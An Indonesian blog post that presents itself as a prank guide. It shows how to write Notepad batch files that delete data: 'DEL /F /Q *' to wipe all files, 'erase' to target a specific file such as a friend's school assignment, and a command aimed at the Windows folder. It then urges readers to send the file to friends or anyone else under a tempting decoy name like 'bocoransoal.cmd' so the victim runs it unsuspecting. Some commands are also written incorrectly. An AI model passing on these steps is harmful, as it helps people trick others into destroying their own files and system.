Best Author
sangdedi

743,603
octa

486,235
fitrotinnikm

456,615
idjah

445,157
dwi

313,549
adit

310,096
resta-andara

275,123
benedict

261,583
rahadian

240,910
bara

228,942
nabilalalala

216,882
kurnitap_

154,132
kuswanto

140,175
suranto

100,765
admin

98,982
iwan

80,055
kupukupu

78,106

Ngerjain temen pake notepad

notepad

Ketemu lagi nih sama saya, udah lama banget gak nulis di Klikbelajar.com

Saya cuma mau share aja nih, kamu pasti kan ada tuh temen yang nyebelinnya minta ampun. Kerjain aja pake cara ini.

Ini bukan virus sih, tapi cukup bikin kesel untuk orang yang kena jebakan betmen kamu.

Alat perangnya cukup NOTEPAD sebagai senjata kamu

Menghapus Files dan Folder

1. buka notepad trus ketik DEL /F /Q *
2. save as dan simpan dengan nama test.cmd
3. kalau kamu dobel klik file test.cmd maka semua files dan folder akan terhapus.

Menghapus Files Tertentu

1. buka notepad trus ketik erase C:TEST.txt
2. save as dan simpan dengan nama test.cmd
3. kalo kamu dobel klik file test.cmd maka files TEST.txt di drive c:\ akan terhapus
4. kamu bisa ganti TEST.txt pakai nama apapun juga, misal kamu tau dia punya file tugas yang disimpen di direktori D: kamu ganti aja jadi D:tugas.doc trus simpen kayak langkah nomor 2 diatas

Menghapus Folder Tertentu

1. buka notepad trus ketik erase C:WINDOWS
2. save as dan simpan dengan nama test.cmd
3. kalo kamu dobel klik file test.cmd maka folder WINDOWS di drive c:\ akan terhapus

nanti begitu dijalanin, dia akan terbuka secara sekilas command prompt seperti ini

cmd

nah kalo sudah jadi, tinggal kalian kirim aja ke temen kalian, ato siapapun. simpel tapi “merugikan”
ps : biar si dia gak curiga kasih nama dengan nama yang mencolok, misal bocoransoal.cmd hehehe

selamat mencoba

Penulis :
Telah menulis sebanyak 7 artikel
Mendapatkan 105 komentar
  Rating tulisan 0 dari 5

1 Comment

  1. kata kata bijak kehidupan

    April 6, 2014 at 3:59 am

    okk.
    nice infonya
    http://cinta009.blogspot.com/

    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>